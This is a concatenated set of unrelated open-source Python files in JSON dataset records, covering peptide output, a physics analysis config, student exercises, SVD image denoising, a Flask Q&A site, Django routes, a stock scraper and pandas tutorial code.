out_f.write('>peptide'+str(i+1)+'\\n')\r\n out_f.write(peptide+'\\n')\r\n\r\nwith open(out_dir + 'unique_peptides/'+mgf_fname+'_all_peptides_top'+str(top_n)+'.fasta', 'w') as out_f:\r\n for i, peptide in enumerate(all_peptides):\r\n out_f.write('>peptide'+str(i+1)+'\\n')\r\n out_f.write(peptide+'\\n')\r\n\r\nprint('number of ribP elonF peptides identified: ', len(ribP_elonF_peptides))\r\nprint('number of peptides identified from extended genomes: ', len(extended_db_peptides))\r\nprint('number of peptides identified from combining both: ', len(all_peptides))\r\n","sub_path":"scripts/get_uniquePeptides.py","file_name":"get_uniquePeptides.py","file_ext":"py","file_size_in_byte":2530,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"60103265","text":"import os\nclass Conf:\n def __init__(self):\n\n# self.httCandidatecut = [\n# ( 'pt' , '>', '200.0' ),\n# ( 'mass', '>', '120.0' ),\n# ( 'mass', '<', '220.0' ),\n# ( 'fW' , '<', '0.175' )\n# ]\n\n self.httCandidatecut = [\n \n ( 'pt' , '>', '200.0' ),\n ( 'mass', '>', 120.0 ),\n ( 'mass', '<', '220.0' ),\n ( 'fW' , '<', '0.175' )\n \n ]\n\n\n self.leptons = {\n \"mu\": {\n \"tight\": {\n \"pt\": 30,\n \"eta\":2.1,\n \"iso\": 0.12\n },\n \"tight_veto\": {\n \"pt\": 0.0,\n \"eta\": 0.0,\n \"iso\": 0.0,\n },\n \"loose\": {\n \"pt\": 20,\n \"eta\": 2.4,\n \"iso\": 0.2,\n },\n \"loose_veto\": {\n \"pt\": 0.0,\n \"eta\": 0.0,\n \"iso\": 0.0,\n },\n \"isotype\": \"relIso03\",\n \"dxy\": 0.2,\n\n },\n \"el\": {\n \"tight\": {\n \"pt\": 30,\n \"eta\": 2.5,\n \"iso\": 0.1\n },\n \"tight_veto\": {\n \"pt\": 20,\n \"eta\": 2.5,\n \"iso\": 0.15,\n },\n \"loose\": {\n \"pt\": 20,\n \"eta\": 2.2,\n \"iso\": 0.15,\n },\n \"loose_veto\": {\n \"pt\": 10,\n \"eta\": 2.2,\n \"iso\": 0.04,\n },\n \"isotype\": \"relIso03\",\n \"dxy\": 0.04,\n }\n }\n self.leptons[\"mu\"][\"tight_veto\"] = self.leptons[\"mu\"][\"loose\"]\n\n self.jets = {\n \"pt\": 30,\n \"eta\": 2.5,\n\n #The default b-tagging algorithm (branch name)\n \"btagAlgo\": \"btagCSV\",\n\n #The default b-tagging WP\n \"btagWP\": \"CSVM\",\n\n #These working points are evaluated and stored in the trees as nB* - number of jets passing the WP\n #https://twiki.cern.ch/twiki/bin/view/CMSPublic/SWGuideBTagging#Preliminary_working_or_operating\n \"btagWPs\": {\n \"CSVM\": (\"btagCSV\", 0.814),\n \"CSVL\": (\"btagCSV\", 0.423),\n \"CSVT\": (\"btagCSV\", 0.941)\n },\n\n #if btagCSV, untagged/tagged selection for W mass and MEM is done by CSVM cut\n #if btagLR, selection is done by the btag likelihood ratio permutation\n \"untaggedSelection\": \"btagCSV\"\n }\n\n self.general = {\n \"controlPlotsFileOld\": os.environ[\"CMSSW_BASE\"]+\"/src/TTH/MEAnalysis/root/ControlPlotsTEST.root\",\n \"controlPlotsFile\": os.environ[\"CMSSW_BASE\"]+\"/src/TTH/MEAnalysis/root/ControlPlotsV6.root\",\n \"sampleFile\": os.environ[\"CMSSW_BASE\"]+\"/src/TTH/MEAnalysis/python/samples_vhbb.py\",\n \"transferFunctionsPickle\": os.environ[\"CMSSW_BASE\"]+\"/src/TTH/MEAnalysis/root/transfer_functions.pickle\",\n \"transferFunctions_sj_Pickle\": os.environ[\"CMSSW_BASE\"]+\"/src/TTH/MEAnalysis/root/transfer_functions_sj.pickle\",\n\n #If the list contains:\n # \"gen\" - print out the ttH gen-level particles (b from top, b form higgs, q from W, leptons\n # \"reco\" - print out the reco-level selected particles\n # \"matching\" - print out the association between gen and reco objects\n #\"verbosity\": [\"eventboundary\", \"input\", \"matching\", \"gen\", \"reco\"],\n \"verbosity\": [],\n\n #Process only these events (will scan through file to find)\n #\"eventWhitelist\": [\n # (1, 1201, 120035),\n # #(1, 626, 62574),\n # #(1, 180, 17914)\n #]\n }\n\n self.mem = {\n\n #Actually run the ME calculation\n #If False, all ME values will be 0\n \"calcME\": True,\n #\"calcME\": False,\n\n #Which categories to analyze the matrix element in\n \"MECategories\": [\"cat1\", \"cat2\", \"cat3\", \"cat6\"],\n #\"MECategories\": [\"cat1\"],\n\n #If bLR > cut, calculate ME\n #only used if untaggedSelection=btagLR\n \"btagLRCut\": {\n \"cat1\": -100.0,\n \"cat2\": -100.0,\n \"cat3\": -100.0,\n \"cat6\": -100.0\n },\n\n #if a number is N specified for wq, tb, hb (+ _btag), require\n #that reco jets dR matched to quarks from W, top, higgs >= N\n #in order to calculate the ME.\n #If disabled, calculate ME regardless of gen-level matching\n \"requireMatched\": {\n #\"cat2\": {\n # \"wq_btag\": 1,\n # \"hb_btag\": 2,\n # \"tb_btag\": 2,\n #},\n #\"cat1\": {\n # \"wq_btag\": 2,\n # \"hb_btag\": 2,\n # \"tb_btag\": 2,\n #},\n #\"cat3\": {\n # \"wq_btag\": 1,\n # \"hb_btag\": 2,\n # \"tb_btag\": 2,\n #},\n },\n\n \"methodsToRun\": [\n\n #full ME\n \"default\",\n \"oldTF\",\n \"MissedWQ\",\n\n #These are additional MEM checks, where only part of the MEM is ran.\n #Switched off by default\n\n \"NumPointsDouble\",\n \"NumPointsHalf\",\n #\"NoJacobian\",\n #\"NoDecayAmpl\",\n #\"NoPDF\",\n #\"NoScattAmpl\",\n #\"QuarkEnergy98\",\n #\"NuPhiRestriction\",\n #\"JetsPtOrder\",\n #\"JetsPtOrderIntegrationRange\",\n \"Recoil\",\n \"Sudakov\",\n \"Minimize\",\n ],\n\n }\n","sub_path":"MEAnalysis/python/MEAnalysis_cfg_heppy.py","file_name":"MEAnalysis_cfg_heppy.py","file_ext":"py","file_size_in_byte":6089,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"264872605","text":"#1\n\n#ex34\n# animals = ['bear', 'python3.6', 'peacock', 'kangaroo', 'whale', 'platypus']\n#\n# 1. bear\n# 2. python3.6\n# 3. bear\n# 4. peacock\n# 5. kangaroo\n# 6. python3.6\n# 7. whale\n# 8. kangaroo\n\n#2\n#create function and argument\nx = int(input(\"Enter the time in minutes you want to convert to seconds > \"))\n#create a variable asking for input, do math and print\ndef sec (x):\n y= x * 60 + 42\n print(f\"There are this many {y} seconds\")\n\nsec(x)\n#call function\n\n#3\n#create a variable that takes input\nkilo = int(input(\"Enter the amount of kilometers you want to convert: > \"))\ndef conv(kilo):\n#create function\n mile = kilo / 1.61\n #do math and print result\n print(f\"There are this many miles {mile}\")\n\nconv(kilo)\n#pull function\n\n\n#4\nfaren = int(input(\"Enter the degrees in fahrenheight that you want to convert to celsius: > \"))\n#assign variable to input integer\ndef conv1(faren):\n #define function\n #do math and store in variable\n c = ((faren - 32) * (5/9))\n print(f\"{faren} degrees in farenheight is {c} degrees celsius\")\n\nconv1(faren)\n #call function\n\n\n#5\nimport math\n#import math library\nz = int(input(\"Enter one of the numbers 81, 19, 16, 121 to get the square root of it \"))\n#make if elif statements to print sqrt of the number input\nif z == 81:\n print(f\"The square root of {z} is {math.sqrt(z)}\")\n\nelif z == 19:\n print(f\"The square root of {z} is {math.sqrt(z)}\")\n\nelif z == 16:\n print(f\"The square root of {z} is {math.sqrt(z)}\")\n\nelif z == 121:\n print(f\"The square root of {z} is {math.sqrt(z)}\")\n\nelse:\n print(\"Wrong number mate! \")\n#make an else for other numbers they input\n\n#6\n#returns area of a circle r = 9\nr = int(input(\"Enter the radius you want to get the area of \"))\n#make function and do the math math.pi represents pi ** is square\ndef area(r):\n a = (r ** 2) * math.pi\n print(f\"Area of {r} is {a} \")\n#call function\narea(r)\n\n\n#7\n#create input\n\n#define x in the strings\n\n#make if else statements if x in num6 then return true and print it otherwise false\nnum6 =str(input(\"Type a string in here >> \"))\n#\ndef xinsid(num6):\n if (\"x\" in num6):\n print(True)\n return True\n\n else:\n print(False)\n return False\n\nxinsid(num6)\n#call function\n\n#8\n#boolean function that returns true false if letters are a,e,i,o,u and in string by user\nnum7 = input(\"Type something in here >\")\nprint(num7)\n\ndef aeiou(num7):\n letters= [\"a\", \"e\", \"i\", \"o\", \"u\"]\n print(letters[0])\n print(len(letters))\n for i in range(len(letters)):\n if (letters[i] in num7):\n print(True)\n return True\n\n else:\n print(False)\n return False\n\naeiou(num7)\n\n#9 slack\n\n#write function\n\ndef rad6(v):\n r6 = (4/3) * math.pi*v**3\n print(r6)\n\nrad6(5)\n\n#10\n#make function, take an input\n#make if/else statement\n#do math inside and print and return true false\n#call function\nw = int(input(\"Enter a number to divide by 3: \"))\n\ndef num10(w):\n if w % 3 == 0:\n print(True)\n return True\n\n else:\n print(False)\n return False\nnum10(w)\n\n#11\n#do import datetime to get preset function\n#assign a variable to datetie.date.today() and print it\nimport datetime\nnow = datetime.date.today()\nprint (now)\n\n#12\n#do import datetime\n#assign variable to time formula and print variable\nimport datetime\ncurrent = datetime.datetime.now().time()\nprint(current)\n\n#13\n#type up input, then function\n#use count and put string in quotes for it to count that string\n#asssign it variable and print it\ng = input(\"Type in something here > \")\n\ndef acount(g):\n f = g.count('a')\n print(f\"{g} has an 'a' in it {f} times \")\n\nacount(g)\n\n\n\n#14\n#write an input and assign to variable\n#create function, have it print lenth of variable and call function\n\ne = input(\"Enter your word here >> \")\n\ndef wrdcnt(e):\n print(f\"{e} has {len(e)} letters\" )\n\nwrdcnt(e)\n\n#15\n#make function, leave it blank this time since we wont be taking input\n#start the count at 20, do a while loop and print what it counts\n#make count equal to itself minus 1 so it goes down each time loop goes\n#call fucntion\n\ndef cnt():\n count = 20\n while count >= 0:\n print(count)\n count = count - 1\n\ncnt()\n\n#16\n#make it divisible by 2 remainder 0 after wrtiing function\n#print even if true, else make it odd and call function\n\n\nk =int(input(\"Enter a number here > \"))\ndef numodd(k):\n if k % 2 == 0:\n print(\"This is even\")\n\n else:\n print(\"This is odd\")\n\nnumodd(k)\n\n\n#17\n#do the input\n\nl = input(\"Enter a string here > \")\ndef strlng(l):\n counter = 0\n for char in l:\n counter += 1\n print(counter)\n\nstrlng(l)\n\n#18\n#do the input\nu = input(\"Enter a string here > \")\nwhile len(u):\n u += 1\n print(u)\n","sub_path":"classactiv9-23.py","file_name":"classactiv9-23.py","file_ext":"py","file_size_in_byte":4735,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"385846814","text":"import numbers\nimport numpy as np\n\nfrom time import time\nfrom sklearn.utils.extmath import randomized_svd\n\nfrom ..feature import extract_patches\nfrom ..feature import reconstruct_patches\n\n\ndef low_rank_svd(data, rank, compute_uv = False):\n u, s, v = randomized_svd(data, rank)\n if compute_uv == True:\n return u, s, v\n else:\n return s\n\n\ndef denoise_svd_single_image(img, patch_size, n_components, extraction_step=None, verbose=True):\n if isinstance(patch_size, numbers.Number):\n patch_size = tuple([patch_size] * 2)\n img_height, img_width = img.shape\n patch_height, patch_width = patch_size\n num_patches = (img_height - patch_height + 1) * (img_width - patch_width + 1)\n\n # Estimate extraction step\n # extraction_step = int(np.ceil(np.sqrt(num_patches / 10000)))\n if extraction_step is None:\n extraction_step = int(patch_size[0]/4)\n if verbose == True:\n print('Extracting reference patches...')\n t0 = time()\n patches = extract_patches(img, patch_size, extraction_step)\n patches = patches.reshape(patches.shape[0], -1)\n if verbose == True:\n print('done in %.2fs.' % (time() - t0))\n print('Singular value decomposition...')\n t0 = time()\n u, s, v = randomized_svd(patches, n_components, random_state=0)\n if verbose == True:\n print('done in %.2fs.' % (time() - t0))\n print('Reconstructing...')\n t0 = time()\n S = np.diag(s)\n patches_ = np.dot(u, np.dot(S, v)).reshape(-1, patch_size[0], patch_size[1])\n data = reconstruct_patches(patches_, img.shape, extraction_step)\n if verbose == True:\n print('done in %.2fs.' % (time() - t0))\n\n return data\n\ndef denoise_svd_stack(imgs, patch_size, n_components, extraction_step=None):\n imgfs = []\n print('denoising...')\n for i, img in enumerate(imgs):\n imgf = denoise_svd_single_image(img, patch_size, n_components, extraction_step, verbose=False)\n imgfs.append(imgf)\n print('{}, '.format(i), end='')\n return np.array(imgfs)\n\ndef denoise_svd_patch(data, patch_size, n_components, extraction_step=None, verbose=True):\n if len(data.shape) == 2:\n data_ = denoise_svd_single_image(data, patch_size, n_components, extraction_step, verbose=verbose)\n elif len(data.shape) == 3:\n data_ = denoise_svd_stack(data, patch_size, n_components, extraction_step)\n return data_\n\n\n# Denoise 2D or 3D image data using direct svd method\ndef denoise_svd_no_patch_single_image(data, rank):\n u, s, v = low_rank_svd(data, rank, compute_uv=True)\n S = np.diag(s)\n return np.dot(u, np.dot(S, v))\n\ndef denoise_svd_no_patch_stack(data, rank):\n return np.array([denoise_svd_no_patch_single_image(img, rank) for img in data])\n\ndef denoise_svd_no_patch(data, rank):\n if len(data.shape) == 2:\n data_ = denoise_svd_no_patch_single_image(data, rank)\n elif len(data.shape) == 3:\n data_ = denoise_svd_no_patch_stack(data, rank)\n return data_\n\n\ndef denoise_svd(data, rank, patch_size = None, extraction_step=None, verbose=True):\n if patch_size == None:\n data_ = denoise_svd_no_patch(data, rank)\n else:\n data_ = denoise_svd_patch(data, patch_size, rank, extraction_step, verbose=verbose)\n return data_\n\n\n\n\n\n\n","sub_path":"denoise/denoise_svd.py","file_name":"denoise_svd.py","file_ext":"py","file_size_in_byte":3256,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"439261647","text":"from flask import Flask, session, redirect, url_for, escape, request, make_response, render_template, redirect, request, \\\n url_for\nimport data_manager\nfrom time import gmtime, strftime\n\napp = Flask(__name__)\napp.secret_key = b'_5#y2L\"F4Q8z\\n\\xec]/'\n\n\n@app.route('/', methods=['GET', 'POST'])\ndef index():\n # return login_as_test()\n session.pop(\"user_name\", None)\n session.pop(\"type\", None)\n session.pop(\"registration\", None)\n\n if request.method == 'POST':\n username = request.form.get('user_name')\n password = request.form.get(\"password\")\n result_list = data_manager.get_line(username)\n if len(result_list) != 1:\n session[\"login\"] = \"wrong\"\n return redirect('/')\n user_row = result_list[0]\n if not data_manager.verify_password(password, user_row['password']):\n session[\"login\"] = \"wrong\"\n return redirect('/')\n session[\"user_name\"] = username\n if username == \"Admin\":\n session[\"type\"] = \"Admin\"\n else:\n session[\"type\"] = \"user\"\n return redirect(url_for(\"list\"))\n questions = data_manager.get_five_question()\n return render_template('index.html', question=questions)\n\n\ndef login_as_test():\n session[\"user_name\"] = \"baba\"\n session[\"type\"] = \"user\"\n return list()\n\n\n@app.route('/visitor')\ndef enter_as_visitor():\n session[\"user_name\"] = \"visitor\"\n session[\"type\"] = \"visitor\"\n return redirect(\"/list\")\n\n\n@app.route('/list', methods=['GET', 'POST'])\ndef list():\n if request.method == 'POST':\n word_for_search = request.form.get(\"search_phrase\")\n return redirect(url_for(\"result\", search_phrase=word_for_search))\n column = request.args.get(\"order_by\")\n direction = request.args.get(\"direction\")\n if column == None:\n column = \"message\"\n direction = \"ASC\"\n question = data_manager.get_all_question(column, direction)\n my_id = data_manager.get_user_id(session[\"user_name\"])\n return render_template(\"list.html\", question=question, my_id=my_id)\n\n\n@app.route('/registration', methods=['GET', 'POST'])\ndef registration():\n session[\"type\"] = \"registration\"\n if request.method == 'POST':\n username = request.form.get('user_name')\n password = request.form.get(\"password\")\n hashed_pw = data_manager.hash_password(password)\n try:\n data_manager.save_user_data(username, hashed_pw)\n session[\"user_name\"] = username\n session[\"type\"] = \"user\"\n return redirect(url_for(\"list\", user_name=username))\n except:\n session[\"registration\"] = \"used\"\n return redirect(url_for('registration'))\n return render_template('registration.html')\n\n\n@app.route('/logout')\ndef logout():\n # remove the username from the session if it's there\n session.pop('username', None)\n session.pop('type', None)\n\n return redirect(url_for('index'))\n\n\n@app.route('/user/')\ndef my_profile(user_id):\n name = session[\"user_name\"]\n profile = data_manager.my_profile(name)\n\n my_questions = data_manager.get_my_questions(name)\n my_answers = data_manager.get_my_answers(name)\n my_comments = data_manager.get_my_comments(name)\n return render_template(\"my_profile.html\", profile=profile, my_questions=my_questions, my_answers=my_answers,\n my_comments=my_comments)\n\n\n@app.route(\"/add-question\", methods=['POST', 'GET'])\ndef add_question():\n new_question = ()\n tags = data_manager.get_tags()\n if request.method == 'POST':\n new_question += (0,)\n new_question += (0,)\n new_question += (request.form.get('title'),)\n new_question += (request.form.get('message'),)\n new_question += (strftime(\"%Y-%m-%d %H:%M:%S\", gmtime()),)\n new_question += (session[\"user_name\"],)\n data_manager.add_new_question(new_question)\n tags = request.form.getlist(\"tag\")\n q_id = data_manager.get_max_question_id()\n ques = q_id[0]\n question_id = ques[\"max\"]\n for tag_id in tags:\n new_tag = (question_id, tag_id)\n data_manager.save_tag(new_tag)\n return redirect(url_for(\"list\"))\n return render_template(\"add_question.html\", tags=tags)\n\n\n@app.route(\"/display_question_vote_up/\")\ndef display_question_vote_up(question_id):\n data_manager.view_number(question_id)\n return redirect(url_for('display_question', question_id=question_id))\n\n\n@app.route(\"/display_question/\")\ndef display_question(question_id):\n question = data_manager.get_question(question_id)\n answer = data_manager.get_answers(question_id)\n question_comments = data_manager.get_question_comments(question_id)\n answer_comments = data_manager.get_answer_comments(question_id)\n tags = data_manager.get_tags_by_question_id(question_id)\n print(question_comments)\n print(session[\"user_name\"])\n return render_template(\"display_question.html\", question=question, answer=answer,\n question_comments=question_comments, answer_comments=answer_comments, tags=tags)\n\n\n@app.route('/display_question//add_answer', methods=['POST', 'GET'])\ndef add_answer(question_id):\n new_answer = ()\n if request.method == 'POST':\n new_answer += (0,)\n new_answer += (question_id,)\n new_answer += (request.form.get('ans'),)\n new_answer += (strftime(\"%Y-%m-%d %H:%M:%S\", gmtime()),)\n new_answer += (session[\"user_name\"],)\n new_answer += (0,)\n data_manager.add_new_answer(new_answer)\n return redirect(url_for('display_question', question_id=question_id))\n return render_template('add_answer.html', question_id=question_id)\n\n\n@app.route('/display_question//delete_question')\ndef delete_question(question_id):\n data_manager.delete_tags(int(question_id))\n data_manager.delete_all_comment(int(question_id))\n data_manager.delete_all_answer(int(question_id))\n data_manager.delete_question(int(question_id))\n return redirect('/list')\n\n\n@app.route('/question//edit', methods=['POST', 'GET'])\ndef edit_question(question_id):\n question_to_edit = data_manager.get_question(question_id)\n if request.method == 'POST':\n new_title = ()\n new_message = ()\n new_title += (request.form.get('title'),)\n new_message += (request.form.get('message'),)\n data_manager.write_edited_question(new_title, new_message, question_id)\n return redirect(url_for(\"display_question\", question_id=question_id))\n return render_template('edit_question.html', question_to_edit=question_to_edit)\n\n\n@app.route('/answer//edit', methods=['POST', 'GET'])\ndef edit_answer(answer_id):\n answer_to_edit = data_manager.get_one_answer(answer_id)\n if request.method == 'POST':\n new_answer = (request.form.get('ans'),)\n data_manager.edit_answer(new_answer, answer_id)\n result = data_manager.get_question_id(answer_id)\n res = result[0]\n question_id = res[\"question_id\"]\n return redirect(url_for('display_question', question_id=question_id, ))\n return render_template('edit_answer.html', answer_to_edit=answer_to_edit)\n\n\n@app.route('/display_question//question_vote_up')\ndef question_vote_up(question_id):\n value = 5\n reputation_by_question_id(value, question_id)\n data_manager.question_vote_up(question_id)\n return redirect(url_for('display_question', question_id=question_id, ))\n\n\n@app.route('/display_question//question_vote_down')\ndef question_vote_down(question_id):\n value = -2\n reputation_by_question_id(value, question_id)\n data_manager.question_vote_down(question_id)\n return redirect(url_for('display_question', question_id=question_id, ))\n\n\n@app.route('/display_question//delete_answer/')\ndef delete_answer(question_id, answer_id):\n data_manager.delete_all_comment(int(question_id))\n data_manager.delete_all_answer(int(question_id))\n data_manager.delete_one_answer(answer_id)\n return redirect(url_for('display_question', question_id=question_id))\n\n\n@app.route('/answer//vote_up')\ndef answer_vote_up(answer_id):\n result = data_manager.get_question_id(answer_id)\n res = result[0]\n question_id = res[\"question_id\"]\n value = 10\n reputation_by_answer_id(value, answer_id)\n data_manager.answer_vote_up(answer_id)\n return redirect(url_for('display_question', question_id=question_id))\n\n\n@app.route('/answer//vote_down')\ndef answer_vote_down(answer_id):\n result = data_manager.get_question_id(answer_id)\n res = result[0]\n question_id = res[\"question_id\"]\n value = -2\n reputation_by_answer_id(value, answer_id)\n data_manager.answer_vote_down(answer_id)\n return redirect(url_for('display_question', question_id=question_id))\n\n\n@app.route('/search?q=')\ndef result(search_phrase):\n word = \"%\" + search_phrase + \"%\"\n questions = data_manager.get_result_q(word)\n answer = data_manager.get_result_a(word)\n return render_template('result.html', questions=questions, answer=answer)\n\n\n@app.route('/question//new-comment', methods=['POST', 'GET'])\ndef add_comment_to_question(question_id):\n if request.method == \"POST\":\n comment = ()\n comment += (question_id,)\n comment += (request.form.get(\"question_comment\"),)\n comment += (strftime(\"%Y-%m-%d %H:%M:%S\", gmtime()),)\n comment += (session[\"user_name\"],)\n data_manager.add_question_comment(comment)\n return redirect(url_for(\"display_question\", question_id=question_id))\n return render_template(\"comment_question.html\", question_id=question_id)\n\n\n@app.route('/answer//new-comment', methods=['POST', 'GET'])\ndef add_comment_to_answer(answer_id):\n ques_id = data_manager.get_question_id(answer_id)\n q_id = ques_id[0]\n question_id = q_id['question_id']\n if request.method == \"POST\":\n comment = ()\n comment += (question_id,)\n comment += (answer_id,)\n comment += (request.form.get('answer_comment'),)\n comment += (strftime(\"%Y-%m-%d %H:%M:%S\", gmtime()),)\n comment += (session['user_name'],)\n data_manager.add_answer_comment(comment)\n return redirect(url_for('display_question', question_id=question_id))\n return render_template(\"comment_answer.html\", answer_id=answer_id, question_id=question_id)\n\n\n@app.route('/comment//edit', methods=['GET', 'POST'])\ndef edit_question_comment(comment_id):\n comment = data_manager.get_one_comment(comment_id)\n comm = comment[0]\n question_id = comm[\"question_id\"]\n if request.method == \"POST\":\n new_comment = request.form.get(\"new_question_comment\")\n data_manager.edit_comment(new_comment, comment_id)\n return redirect(url_for(\"display_question\", question_id=question_id))\n return render_template(\"edit_question_comment.html\", comment=comment)\n\n\n@app.route('/comment//delete/')\ndef delete_question_comment(comment_id, question_id):\n data_manager.delete_question_comments(comment_id)\n return redirect(url_for(\"display_question\", question_id=question_id))\n\n\n@app.route('/userlist')\ndef list_of_users():\n user_list = data_manager.get_all_user()\n user_name = data_manager.get_user_id(session[\"user_name\"])\n\n return render_template(\"list_of_users.html\", user_list=user_list, user_name=user_name)\n\n\ndef reputation_by_question_id(value, question_id):\n user_name_list = data_manager.get_user_name_by_question_id(question_id)\n user_dict = user_name_list[0]\n user_name = user_dict[\"user_name\"]\n data_manager.reputation_handler(user_name, value)\n\n\ndef reputation_by_answer_id(value, answer_id):\n user_name_list = data_manager.get_user_name_by_answer_id(answer_id)\n user_dict = user_name_list[0]\n user_name = user_dict[\"user_name\"]\n data_manager.reputation_handler(user_name, value)\n\n\n@app.route('/accept_answer/')\ndef accept_answer(answer_id):\n value = 15\n reputation_by_answer_id(value, answer_id)\n data_manager.set_answered(answer_id)\n result = data_manager.get_question_id(answer_id)\n res = result[0]\n question_id = res[\"question_id\"]\n return redirect(url_for(\"display_question\", question_id=question_id))\n\n\n@app.route('/tags')\ndef tag_list():\n tags = data_manager.count_tags()\n return render_template(\"tags.html\", tags=tags)\n\n\ndef reg_vote(question_id):\n new_voter = session[\"user_name\"]\n result_str = data_manager.check_question_to_vote(question_id)\n result = result_str[0]\n my_str = result[\"voted_by\"]\n my_str += new_voter + \"-\"\n data_manager.reg_question_to_vote(question_id, my_str)\n\n\ndef check_vote(question_id):\n result_str = data_manager.check_question_to_vote(question_id)\n result = result_str[0]\n my_str = result[\"voted_by\"]\n converted_list = list(my_str.split(\"-\"))\n\n\nif __name__ == '__main__':\n app.run(debug=True)\n","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":13010,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"112610542","text":"#!/usr/bin/env python3.6\n\nimport sys\nfrom argparse import ArgumentParser\n\nfrom checks import equiv_symbolic, string_match, is_expanded\nfrom checks import parse_checks, check_func\n\ndef parse_args():\n parser = ArgumentParser()\n parser.add_argument('-i', dest='input',\n action='store', type=str, default=None,\n help=\"input LaTeX string (a student's answer)\")\n parser.add_argument('-e', dest='expected',\n action='store', type=str, default=None,\n help='expected string against which the comparison '\n 'is being done (the correct answer)')\n parser.add_argument('-s', dest='checks',\n action='store', type=str, default=None,\n help='check options with suboptions')\n args = parser.parse_args()\n\n if args.input is None or\\\n args.expected is None or\\\n args.checks is None:\n parser.print_help()\n sys.exit(0)\n\n check_list = parse_checks(args.checks)\n \n return args.input.strip('$'), args.expected.strip('$'), check_dict\n\nif __name__ == '__main__':\n input_latex, expected_latex, checks = parse_args()\n\n # perform all checks\n for check in checks:\n result = check_func[check](input_latex, expected_latex, checks[check])\n if result != 'true':\n print(result)\n break\n else:\n print('true')\n","sub_path":"evaluate.py","file_name":"evaluate.py","file_ext":"py","file_size_in_byte":1447,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"220331354","text":"# File find_fraction.py\n\n\"\"\"\nприймає 1 аргумент -- невід'ємне ціле число summ, \nта повертає тьюпл, що містить 2 цілих числа --\nчисельник та знаменник найбільшого правильного\nнескорочуваного дробу, для якого сума чисельника\nта знаменника дорівнює summ.\nПовернути False, якщо утворити такий дріб неможливо.\n\"\"\"\n\ndef find_fraction(summ):\n if summ < 3:\n return False\n half = summ / 2\n if summ % 2 == 0:\n if half % 2 == 0:\n return (half - 1, half + 1)\n else:\n return (half - 2, half + 2)\n else:\n return (half - 0, half + 1)\n","sub_path":"prometheus/find_fraction.py","file_name":"find_fraction.py","file_ext":"py","file_size_in_byte":791,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"470157590","text":"from django.urls import path\nfrom . import views\n\napp_name = 'absensi'\n\nurlpatterns = [\n # path('')\n path('absen/', views.Scan, name='absen'),\n # path('keluar/', views.keluar, name='keluar'),\n # path('kendala/', include('covid19_apps.urls', namespace='kendala')),\n path('', views.index, name='list'),\n # path('logout/', views.singout, name='logout'),\n]\n","sub_path":"absensi_apps/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":371,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"35282427","text":"import subprocess\nimport json\nfrom urllib2 import urlopen\nimport time\n\nwhile 1:\n\n url = 'http://finance.google.com/finance/info?client=ig&q=Dow:AXP,%20AAPL,%20BA,%20CAT,%20CSCO,%20CVX,%20DD,%20XOM,%20GE,%20GS,%20HD,%20IBM,%20INTC,%20JNJ,%20KO,%20JPM,%20MCD,%20MMM,%20MRK,%20MSFT,%20NKE,%20PFE,%20PG,%20TRV,%20UNH,%20UTX,%20VZ,%20V,%20WMT,%20DIS'\n\n connection = urlopen(url)\n\n page = connection.read()\n keepers = [\"e\",\"t\",\"l\",\"lt_dts\"]\n\n obj = json.loads(page[3:])\n for quote in obj:\n for k in quote.keys():\n if k not in keepers:\n del quote[k]\n elif k==\"lt_dts\":\n quote[k] = quote[k].replace(\"T\",\" \").replace(\"-\",\"/\").replace(\"Z\",\"\")\n quote = json.dumps(quote)\n subprocess.call(['curl','-X','POST','http://192.168.168.234:9200/stocks/quotes/', '-d',quote])\n time.sleep(1)\n","sub_path":"stockscraper.py","file_name":"stockscraper.py","file_ext":"py","file_size_in_byte":973,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"208534286","text":"from pandas import Series, DataFrame\nimport pandas as pd\nimport numpy as np\n\n# 5.1\n\n## 5.1.1 Series\nobj = Series([4, 7, -5, 3])\nobj\n\nobj.values\nobj.index\n\nobj2 = Series([4, 7, -5, 3], index=['d', 'b', 'a', 'c'])\nobj2\n\nobj2.index\nobj2['a']\n\nobj2['d'] = 6\nobj2[['c', 'a', 'd']]\n\nobj2[obj2 > 0]\n\nobj2 * 2\n\n'b' in obj2\n'e' in obj2\n\nsdata = {'Ohio': 35000, 'Texas': 71000, 'Oregon': 16000, 'Utah': 5000}\nobj3 = Series(sdata)\nobj3\n\nstates = ['California', 'Ohio', 'Oregon', 'Texas']\nobj4 = Series(sdata, index=states)\nobj4\n\npd.isnull(obj4)\n\npd.notnull(obj4)\n\nobj4.isnull()\n\nobj3\nobj4\nobj3 + obj4\n\n\n## 5.1.2 DataFrame\ndata = {'state': ['Ohio', 'Ohio', 'Ohio', 'Nevada', 'Nevada'],\n 'year': [2000, 2001, 2002, 2001, 2002],\n 'pop': [1.5, 1.7, 3.6, 2.4, 2.9]}\nframe = DataFrame(data)\n\nframe\n\nDataFrame(data, columns=['year', 'state', 'pop'])\n\nframe2 = DataFrame(data, columns=['year', 'state', 'pop', 'debt'],\n index=['one', 'two', 'three', 'four', 'five'])\nframe2\n\nframe2.columns\n\nframe2['state']\n\nframe2.year\n\nframe2.ix['three']\n\nframe2['debt'] = 16.5\nframe2\n\nframe2['debt'] = np.arange(5.)\nframe2\n\nval = Series([-1.2, -1.5, -1.7], index=['two', 'four', 'five'])\nframe2['debt'] = val\nframe2\n\nframe2['eastern'] = frame2.state == 'Ohio'\nframe2\ndel frame2['eastern']\nframe2.columns\n\n\npop = {'Nevada': {2001: 2.4, 2002: 2.9},\n 'Ohio': {2000: 1.5, 2001: 1.7, 2002: 3.6}}\nframe3 = DataFrame(pop)\nframe3\n\nframe3.T\n\nDataFrame(pop, index=[2001, 2002, 2003])\n\npdata = {'Ohio': 